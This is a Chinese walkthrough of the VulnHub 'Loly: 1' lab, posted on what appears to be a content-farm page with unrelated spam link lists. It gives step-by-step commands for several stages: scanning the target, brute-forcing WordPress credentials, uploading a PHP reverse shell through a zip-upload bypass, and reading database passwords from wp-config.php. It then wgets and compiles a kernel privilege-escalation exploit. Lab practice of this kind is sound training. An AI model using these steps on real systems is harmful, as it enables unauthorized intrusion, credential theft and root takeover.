当前位置: 首页 > wzjs >正文

免费做数据采集的网站开电商需要多少钱

免费做数据采集的网站,开电商需要多少钱,中国建筑装饰网排行,化妆品网站建设平台的分析Loly: 1 来自 <Loly: 1 ~ VulnHub> 1&#xff0c;将两台虚拟机网络连接都改为NAT模式 2&#xff0c;攻击机上做namp局域网扫描发现靶机 nmap -sn 192.168.23.0/24 那么攻击机IP为192.168.23.182&#xff0c;靶场IP192.168.23.241 3&#xff0c;对靶机进行端口服务探测 n…

Loly: 1

来自 <Loly: 1 ~ VulnHub>

 

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.241

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.241

访问80端口的http服务

扫描网站子目录

dirsearch -u http://192.168.23.241 -x 403,404

 

4,扫描出来了wordpress的网页,访问看看

加载缓慢,修改/etc/hosts文件试试

echo "192.168.23.241 loly.lc" >>/etc/hosts

访问 http://loly.lc/wordpress/ 的速度果然变快了

登录网站如下 http://loly.lc/wordpress/wp-login.php

 

5,对网站进行指纹识别扫描

whatweb -v http://loly.lc/wordpress/

 

6,然后再尝试使用wpscan进行扫描爆破用户名

gunzip /usr/share/wordlists/rockyou.txt.gz

成功爆破出账户密码loly/fernando

 

7,使用账户密码进行登录,登录成功

然后寻找webshell的上传点

http://loly.lc/wordpress/wp-admin/admin.php?page=adrotate-media

cp /usr/share/webshells/php/php-reverse-shell.php .

vim php-reverse-shell.php

上传失败

先上传zip文件,访问的时候以php后缀名访问

mv php-reverse-shell.php shell.php

zip -r -o shell.php.zip shell.php

再次上传,上传文件成功

然后看到文件上传的位置,由此进行一个访问触发反弹shell

http://loly.lc/wordpress/wp-content/banners/shell.php

与此同时kali打开对4444端口的监听,成功getshell

 

8,然后使用python脚本获取一个可交互shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

信息收集一下,一般的套路就是阅读mysql数据库配置文件,获取数据库账户密码。然后登录数据库,获取普通用户/超级用户泄露的账号密码

cat wp-config.php

得到mysql账号密码wordpress/lolyisabeautifulgirl

 

9,然后登录mysql数据库

mysql -u wordpress -p

show databases;

use  wordpress;

show tables;

select * from wp_users;

但是这个密码没什么用

 

10,发现使用这个密码可以直接切换loly用户

lolyisabeautifulgirl

uname -a

lsb_release -a

搜索内核提权漏洞

searchsploit 4.4.0-31 ubuntu Privilege

把脚本下载到当前目录下

searchsploit -m 45010.c

 

11,在kali使用python开启监听,然后靶机使用wget下载即可
python -m http.server

wget http://192.168.23.182:8000/45010.c

使用gcc编译器编译提权exp

gcc 45010.c -o exp

chmod +x exp

./exp

提权成功,成功get flag

 

 

http://www.dtcms.com/wzjs/389273.html

相关文章:

  • 华军软件园下载中心优化推广网站怎么做
  • 景安怎么把网站做别名新闻今天最新消息
  • 烟台网站建设首推企汇互联见效付款沈阳关键词seo
  • 网站建设用苹果电脑360外链
  • 做网站彩票代理多少钱啊磁力天堂最佳搜索引擎入口
  • 兴平市住房和城乡建设局门户网站新冠疫情最新情况最新消息
  • 南昌网站建设和推广关于进一步优化落实疫情防控措施
  • 做网站送给女友意义营销策划与运营方案
  • 永久域名网站网站seo优化技能
  • 做外贸 网站没有邮箱怎么找b站大全永不收费2023入口在哪
  • 不属于网站后期维护青岛seo优化公司
  • 食品网站开发by72777最新域名查询
  • 单页网站制作教程营销策略手段有哪些
  • 下载flash网站网站seo推广营销
  • 镇江做网站的淘宝关键词搜索工具
  • 零基础自学python上海搜索引擎优化seo
  • 马蜂窝旅游网站怎么做股票发行ipo和seo是什么意思
  • qt做网站服务器引流推广广告怎么写
  • 男女做爰视频网站在线视频优化关键词排名seo软件
  • 佛山网站建设有限公司个人怎么在百度上做推广
  • 网站页面模板 建设中指数基金是什么意思
  • 做网站记者的出路是什么网页关键词排名优化
  • 建站行业发展趋势百度查重
  • 做网站的工作好吗长沙seo排名公司
  • 上海徐汇区网站建设网站标题优化排名
  • 怎么仿网站如何申请网站域名流程
  • 网站站长统计代码托管竞价推广公司
  • 徐州网站建设制作工作室游戏推广平台代理
  • 西安做网站公司哪家好百度提问首页
  • 内涵 网站 源码360搜索首页